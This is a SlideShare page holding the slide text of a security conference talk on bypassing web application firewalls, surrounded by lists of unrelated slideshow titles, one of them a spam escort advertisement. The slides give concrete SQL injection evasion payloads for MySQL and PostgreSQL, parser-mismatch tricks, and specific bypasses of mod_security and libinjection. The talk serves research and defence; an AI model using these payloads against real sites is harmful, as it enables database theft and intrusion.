Web Application Firewalls: Advanced analysis of detection logic mechanisms, V...Web Application Firewalls: Advanced analysis of detection logic mechanisms, V...
Web Application Firewalls: Advanced analysis of detection logic mechanisms, V...
 
[Defcon24] Introduction to the Witchcraft Compiler Collection
[Defcon24] Introduction to the Witchcraft Compiler Collection[Defcon24] Introduction to the Witchcraft Compiler Collection
[Defcon24] Introduction to the Witchcraft Compiler Collection
 

Similar to Lie to Me: Bypassing Modern Web Application Firewalls

Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)
Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)
Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)Ontico
 
ELK stack at weibo.com
ELK stack at weibo.comELK stack at weibo.com
ELK stack at weibo.com琛琳 饶
 
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL InjectionShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL InjectionChema Alonso
 
JSLT: JSON querying and transformation
JSLT: JSON querying and transformationJSLT: JSON querying and transformation
JSLT: JSON querying and transformationLars Marius Garshol
 
Artem Storozhuk "Building SQL firewall: insights from developers"
Artem Storozhuk "Building SQL firewall: insights from developers"Artem Storozhuk "Building SQL firewall: insights from developers"
Artem Storozhuk "Building SQL firewall: insights from developers"Fwdays
 
Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levelsbeched
 
Ensuring High Availability for Real-time Analytics featuring Boxed Ice / Serv...
Ensuring High Availability for Real-time Analytics featuring Boxed Ice / Serv...Ensuring High Availability for Real-time Analytics featuring Boxed Ice / Serv...
Ensuring High Availability for Real-time Analytics featuring Boxed Ice / Serv...MongoDB
 
Vulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing LevelsVulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing LevelsPositive Hack Days
 
Don't Be Afraid of Abstract Syntax Trees
Don't Be Afraid of Abstract Syntax TreesDon't Be Afraid of Abstract Syntax Trees
Don't Be Afraid of Abstract Syntax TreesJamund Ferguson
 
Fosdem10
Fosdem10Fosdem10
Fosdem10wremes
 
A guided fuzzing approach for security testing of network protocol software
A guided fuzzing approach for security testing of network protocol softwareA guided fuzzing approach for security testing of network protocol software
A guided fuzzing approach for security testing of network protocol softwarebinish_hyunseok
 
ETL with SPARK - First Spark London meetup
ETL with SPARK - First Spark London meetupETL with SPARK - First Spark London meetup
ETL with SPARK - First Spark London meetupRafal Kwasny
 
Search for Vulnerabilities Using Static Code Analysis
Search for Vulnerabilities Using Static Code AnalysisSearch for Vulnerabilities Using Static Code Analysis
Search for Vulnerabilities Using Static Code AnalysisAndrey Karpov
 
Next Generation DevOps in Drupal: DrupalCamp London 2014
Next Generation DevOps in Drupal: DrupalCamp London 2014Next Generation DevOps in Drupal: DrupalCamp London 2014
Next Generation DevOps in Drupal: DrupalCamp London 2014Barney Hanlon
 
introduction to node.js
introduction to node.jsintroduction to node.js
introduction to node.jsorkaplan
 

Similar to Lie to Me: Bypassing Modern Web Application Firewalls (20)

Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)
Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)
Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)
 
ELK stack at weibo.com
ELK stack at weibo.comELK stack at weibo.com
ELK stack at weibo.com
 
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL InjectionShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
 
Run Node Run
Run Node RunRun Node Run
Run Node Run
 
JSLT: JSON querying and transformation
JSLT: JSON querying and transformationJSLT: JSON querying and transformation
JSLT: JSON querying and transformation
 
Artem Storozhuk "Building SQL firewall: insights from developers"
Artem Storozhuk "Building SQL firewall: insights from developers"Artem Storozhuk "Building SQL firewall: insights from developers"
Artem Storozhuk "Building SQL firewall: insights from developers"
 
Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levels
 
Ensuring High Availability for Real-time Analytics featuring Boxed Ice / Serv...
Ensuring High Availability for Real-time Analytics featuring Boxed Ice / Serv...Ensuring High Availability for Real-time Analytics featuring Boxed Ice / Serv...
Ensuring High Availability for Real-time Analytics featuring Boxed Ice / Serv...
 
Nodejs - A quick tour (v6)
Nodejs - A quick tour (v6)Nodejs - A quick tour (v6)
Nodejs - A quick tour (v6)
 
Vulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing LevelsVulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing Levels
 
Don't Be Afraid of Abstract Syntax Trees
Don't Be Afraid of Abstract Syntax TreesDon't Be Afraid of Abstract Syntax Trees
Don't Be Afraid of Abstract Syntax Trees
 
Fosdem10
Fosdem10Fosdem10
Fosdem10
 
Solr @ Etsy - Apache Lucene Eurocon
Solr @ Etsy - Apache Lucene EuroconSolr @ Etsy - Apache Lucene Eurocon
Solr @ Etsy - Apache Lucene Eurocon
 
A guided fuzzing approach for security testing of network protocol software
A guided fuzzing approach for security testing of network protocol softwareA guided fuzzing approach for security testing of network protocol software
A guided fuzzing approach for security testing of network protocol software
 
ETL with SPARK - First Spark London meetup
ETL with SPARK - First Spark London meetupETL with SPARK - First Spark London meetup
ETL with SPARK - First Spark London meetup
 
Search for Vulnerabilities Using Static Code Analysis
Search for Vulnerabilities Using Static Code AnalysisSearch for Vulnerabilities Using Static Code Analysis
Search for Vulnerabilities Using Static Code Analysis
 
Next Generation DevOps in Drupal: DrupalCamp London 2014
Next Generation DevOps in Drupal: DrupalCamp London 2014Next Generation DevOps in Drupal: DrupalCamp London 2014
Next Generation DevOps in Drupal: DrupalCamp London 2014
 
introduction to node.js
introduction to node.jsintroduction to node.js
introduction to node.js
 
Angular2 for Beginners
Angular2 for BeginnersAngular2 for Beginners
Angular2 for Beginners
 
Price of an Error
Price of an ErrorPrice of an Error
Price of an Error
 

Recently uploaded

"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 

Recently uploaded (20)

"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort ServiceHot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 

Lie to Me: Bypassing Modern Web Application Firewalls

  • 1. bypassing modern web application firewalls @ONsec_lab, http://lab.onsec.ru
  • 2. About • Security audits of webapps since 2009 • @d0znpp twitter • @ONsec_lab twitter • Nice blog! http://lab.onsec.ru - [ENG] • d0znpp[at]ONsec[dot]ru еmаi1
  • 3. WTF WAF? • Web Application Firewall • Prevent attacks • Attack !=Vulnerability • Risk != Attack
  • 4. SoftwareVS Hardware • Different HTTP parsers • Many «hardware» WAFs used Apache, Lighttpd, Nginx forks
  • 5. Implementation • Failover bypass: • DoS/DDoS WAF for bypass it- why not?! • What happens with traffic when your filter is overloaded? • XML, regexp, token bombs for this • Not so silently, right? :)
  • 6. WAF work stages • Parse HTTP packet from client (web server to this in general case) • Determine rules that must be applied to current URL/client/hostname/etc • Normalize data (2-nd urldecode, base64, etc) • Do detection logic (such as regexpr) • Make detection decision (true/false/score)
  • 7. WAF work stages • Parse HTTP packet from client (web server to this in general case) • Determine rules that must be applied to current URL/client/hostname/etc • Normalize data (2-nd urldecode, base64, etc) • Do detection logic (such as regexpr) • Make detection decision (true/false/score)
  • 9. Parse HTTP packets • First read: «Protocol-Level Evasion of Web Application Firewalls», Ivan Ristic, BH- US-2012 • Nice yesterday bypass Imperva by @webpentest during PHDays WAF bypass contest: Content-Type: invalid :))) • Classic example - HTTP Parameter Pollution • Are you sure that WAF’s and webapp’s HTTP protocols are the same?
  • 10. WAF work stages • Parse HTTP packet from client (web server to this in general case) • Determine rules that must be applied to current URL/client/hostname/etc • Normalize data (2-nd urldecode, base64, etc) • Do detection logic (such as regexpr) • Make detection decision (true/false/score)
  • 11. Data normalization level bug looks like tunnel
  • 12. Data normalization • Format parsers, for example: • base64 • xml • JSON • Are you sure that WAF’s and webapp’s parsers are the same?
  • 13. Data normalization • mod_security, t:base64decode • decode string until first = char • PHP, base64_decode($strict=false) • decode whole string • Attack vector • YWFh=attackhere • Use t:base64DecodeExt!
  • 14. Data normalization • Yet another example from yesterday PHDays WAF bypass contest - Imperva XML decoding • First decode XML, that validate attacks • XML input was not set up as XML type in WAF • Put attack as XML-encoded data (entities) to bypass regexpr: &#x75;nion select 123
  • 15. WAF work stages • Parse HTTP packet from client (web server to this in general case) • Determine rules that must be applied to current URL/client/hostname/etc • Normalize data (2-nd urldecode, base64, etc) • Do detection logic (such as regexpr) • Make detection decision (true/false/score)
  • 17. Detection logic • Regular expressions (mod_security, etc) • Tokenizers (libinjection) • ...
  • 18. SQL syntax • First read this works: • http://websec.wordpress.com/tag/sql- obfuscation/ • http://www.slideshare.net/nickgsuperstar/ new-techniques-in-sql-obfuscation • Obfuscated vector is more than welcome! • Try to exploit
  • 19. SQL syntax - time to fuzzing! • SELECT{$P1} 1 FROM... • ...UNION{$P2}FROM... • SELECT VERSION{$P3}() • SELECT{$P4}VERSION{P4}() • SELECT 1{P5}BAD
  • 20. MySQL: the classics • SELECT{U} 1 FROM • ...UNION{U}FROM... • SELECT VERSION{U}() • {U} = [0x09,0x0A-0x0D,0x20,0xA0]* • Fuzzed only 1-bytes sequences, not /**/, etc
  • 21. MySQL: time to fuzzing! • SELECT{F}VERSION{F}() • SELECT 1{D}BAD • {F} = {U} + 0x60 (backquote `) • {D} = # + 0x60 • Have a fun with regexp: • select`version` ( ) • ... where id=’1’`’ and ... - commented now
  • 22. MySQL: break tokens! • SELECT{O}1 FROM test • {O} = [-+!~@] • SELECT 1{W}FROM test; • {W} = [.d?|ed] • Part of this discovered during our WAF bypass contest last year by @Black2Fan
  • 23. MySQL: break tokens! • SELECT-1e1FROM test • SELECT~1.FROM test • SELECTNFROM test • SELECT@^1.FROM test • SELECT-id-1.FROM test • all tested on MySQL 5.1.66-0-squeeze1
  • 24. Postgres: the classics • SELECT{U} 1 FROM • ...UNION{U}FROM... • SELECT VERSION{U}() • {U} = [0x09,0x0A,0x0C,0x0D,0x20]* • Fuzzed only 1-bytes sequences, not /**/, etc
  • 25. Postgres: time to fuzz! • SELECT{F}VERSION{F}() • SELECT 1{D}BAD • {F} = {U} + 0x22 (doblequote ‘’) • {D} = # + 0x22 • Have a fun with regexp: • select’’version’’ ( ) • ... where id=’1’`’ and ... - commented now
  • 26. Postgres: break tokens! • SELECT{O}1 FROM test • {O} = [.-+!~@] - @ is absolute operator • SELECT 1{W}FROM test; • {W} = [.d?|ed|] - nothing is also OK!
  • 27. Postgres: break tokens! • SELECT-1ROM test • SELECT.1FROM test • SELECT~1FROM test • SELECT-id-1FROM test • SELECT-id-1FROM test • all tested on PostgreSQL 9.2.4
  • 28. Time to exploit! • mod_security • libinjection • others?
  • 30. mod_security • ?id=select id from test • ?id=select-id-1.from test Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:unions*?(?:all| d i s t i n c t | [ ( ! @ ] * ? ) ? s * ? [ ( [ ] * ? s * ? s e l e c t s + ) | ( ? : w + s + l i ke s + [ " ' ` xc2xb4xe2x80x99xe2x80x98])|(?:likes*?["'`xc2xb4xe2x80x99xe2x80x98]%)| (?:["'`xc2xb4xe2x80x99xe2x80x98]s*?likeW*?["'`xc2xb4 ..." at ARGS:id. [file "/ opt/modsecurity/rules/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: select id from found within ARGS:id: select id from test"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"]
  • 31. mod_security • ?id=1 or 1=1 or • ?id=1 or true or Message: Access denied with code 403 (phase 2). Pattern match "(?i:([s'"` x c 2 x b 4 x e 2 x 8 0 x 9 9 x e 2 x 8 0 x 9 8 ( ) ] * ? ) ( [ d w ] + + ) ( [ s ' " ` xc2xb4xe2x80x99xe2x80x98()]*?)(?:(?:=|<=>|r?like|soundss+like|regexp)([s'"` xc2xb4xe2x80x99xe2x80x98()]*?)2|(?:!=|<=|>=|<>|<|>|^|iss+not|not ..." at A R G S : i d . [ fi l e " / o p t / m o d s e c u r i t y / r u l e s / b a s e _ r u l e s / modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1=1 found within ARGS:id: 1 or 1=1 or "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.7"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/ WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/ 6.5.2"]
  • 32. libinjection • Token based detection • No more regexp! • Fingerprint for each attack 1-5 tokens sequence • 14 token types, 14^5+14^4+14^3+14^2+14 ~= 580k possible fingerprints • Is it enough to block all SQLi?
  • 33. libinjection • Bytes obfuscation doesn’t works now • But... • What happens if you missed some tokens?
  • 34. Attack #1. Missed token / fingerprint • As fuzzed above ` 0x60 byte can be used as a comment in MySQL and also as function quotes • ' into outfile 'asd' -- • block - skksc • ' into outfile 'asd' ` • bypass - skksn
  • 35. Attack #2.Token obfuscation • Find any unblocked fingerprint • Obfuscate your attack to produce the same fingerprint • Fingerprint have only 5 tokens • Need to exploit anti-obfuscation logic (1+1 and others hardcoded token combinations)
  • 36. Attack #2.Token obfuscation • Fingerprint «v1111» looks like safe • @a1a2a3a4 - variable but fingerprint of this string is «v», no numeric token here • @ф1й2у3ц4 - is valid variable for MySQL, but produce fingerprint «v1111» • @ф1й2у3ц4 union select ... produce fingerprint «v1111» also :)
  • 37. Some stats • Hacking WAFs since 2009 • About 50 different implementations • About 10 different engines • Time to hack: • min: 3 min • max: 19 hours • average: 1hour
  • 38. Questions? • @d0znpp twitter • @ONsec_lab twitter • Nice blog! http://lab.onsec.ru - [ENG] • d0znpp[at]ONsec[dot]ru еmаi1